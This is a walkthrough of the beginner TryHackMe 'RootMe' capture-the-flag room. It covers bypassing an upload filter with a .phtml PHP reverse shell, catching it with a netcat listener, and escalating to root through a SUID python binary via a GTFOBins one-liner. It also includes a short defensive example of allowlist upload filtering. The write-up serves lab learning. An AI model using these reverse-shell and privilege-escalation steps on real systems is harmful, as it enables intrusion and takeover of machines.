TryHackMe — RootMe
Difficulty: Easy
Tag line: A CTF for beginners, can you root me?
Once the VPN is set up, we start our enumeration as normal by pinging the target to ensure that the link is stable enough to complete the challenge.
[screenshot: ping output]
[screenshot: nmap output]
Interestingly, we only have two ports to worry about: port 22 (SSH) and port 80 (HTTP).
[screenshot: gobuster output]
Although a number of directories were shown, two are of interest: the first is /panel/ and the second is /uploads/. So let's check them out.
website
The initial page is a ticker-tape type view.
If we check the /panel/ directory we see an upload form. So let's assume that the /uploads/ directory will hold these files. Using pentestmonkey's PHP reverse shell we can try to upload the file.
Before we do this, make sure that we edit the file to set our attacker machine's IP address and port:
Now upload our file.
So not as successful as I would have liked!
Obviously .php files are not allowed. A quick search for valid PHP file extensions brings up the following:
- .php
- .php3
- .php4
- .php5
- .phtml
Let's try it with .phtml and see if that works.
Great, that works. A quick visit to the /uploads/ directory confirms this.
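The check that was bypassed here is an extension blacklist: the form rejects ".php" but nothing else. The following is an added example, not code from the room or from this writeup, that contrasts a blacklist filter mirroring the observed behaviour with an allowlist filter that rejects the .phtml variant; the function names and the image allowlist are my assumptions.

```python
import os
from typing import Dict, Iterable, List, Tuple

# Constructed to mirror the room: the only thing observed to be rejected
# was a bare ".php" extension. A blacklist of this shape is trivially bypassed.
PHP_BLACKLIST = {".php"}

# Hardened approach (assumed requirement): only allow what the panel actually
# needs, and check every suffix so "shell.php.jpg" cannot slip past either.
IMAGE_ALLOWLIST = {".jpg", ".jpeg", ".png", ".gif"}


def _suffixes(filename: str) -> List[str]:
    """Every dotted suffix of a filename, lower-cased: 'a.PHP.jpg' -> ['.php', '.jpg']."""
    base = os.path.basename(filename)
    parts = base.split(".")
    return ["." + p.lower() for p in parts[1:] if p]


def blacklist_allows(filename: str) -> bool:
    """Weak check: rejects the upload only when the final extension is '.php'."""
    _, ext = os.path.splitext(filename)
    return ext.lower() not in PHP_BLACKLIST


def allowlist_allows(filename: str, allowed: Iterable[str] = IMAGE_ALLOWLIST) -> bool:
    """Hardened check: exactly one suffix, and it must be on the allowlist."""
    allowed = set(allowed)
    suffixes = _suffixes(filename)
    return len(suffixes) == 1 and suffixes[0] in allowed


def compare(filenames: Iterable[str]) -> Dict[str, Tuple[bool, bool]]:
    """Map each upload name to (blacklist_result, allowlist_result)."""
    return {n: (blacklist_allows(n), allowlist_allows(n)) for n in filenames}
```

An extension check is only one layer; the uploads directory should also be served with script execution disabled so that a file which does get through is never interpreted as PHP.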
foothold
Now we have the reverse shell file uploaded. We need to set up our netcat listener. I normally use port 4444 (with 8888 for HTTP server setups when required).
┌──(karti㉿kali001)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
- -n numeric-only IP addresses, no DNS
- -l listen mode, for inbound connects
- -v verbose
- -p port local port number
Once the listener is set up you can simply click on the .phtml link on the website, or, my preference, use the curl command:
curl http://$IP/uploads/php-reverse-shell.phtml
From the curl man page:
curl is a tool for transferring data from or to a server. It supports these protocols: DICT, FILE, FTP, FTPS, GOPHER, GOPHERS, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, MQTT, POP3, POP3S, RTMP, RTMPS, RTSP, SCP, SFTP, SMB, SMBS, SMTP, SMTPS, TELNET or TFTP. The command is designed to work without user interaction.
By running the command we get the reverse shell.
┌──(karti㉿kali001)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.11.56.134] from (UNKNOWN) [10.10.10.174] 34390
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
11:12:06 up 1:23, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
We have a basic shell, so let's make it more interactive:
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl + Z (to background it)
stty raw -echo; fg (brings it back to the foreground; just press return twice)
Now we can see the current user in the prompt, and can confirm it with id:
www-data@rootme:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
escalation
We check whether www-data has any additional permissions with sudo -l:
www-data@rootme:/$ sudo -l
[sudo] password for www-data:
However, it requires a password, so we need another method to elevate privileges. Checking for SUID bits may help. This link gives you some more details.
www-data@rootme:/$ find / -perm -4000 2>/dev/null
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
There are a lot of SUID files (I have only shown a few here), but /usr/bin/python stands out from the norm.
Checking GTFOBins for python, we find a SUID entry:
./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
We just need to use the full path to the binary and we should be good to go.
www-data@rootme:/$ /usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
cat /root/root.txt
THM{p*******************}
summary
A really nice room that brought in two areas I was familiar with, GTFOBins (SUID) and PHP file extensions.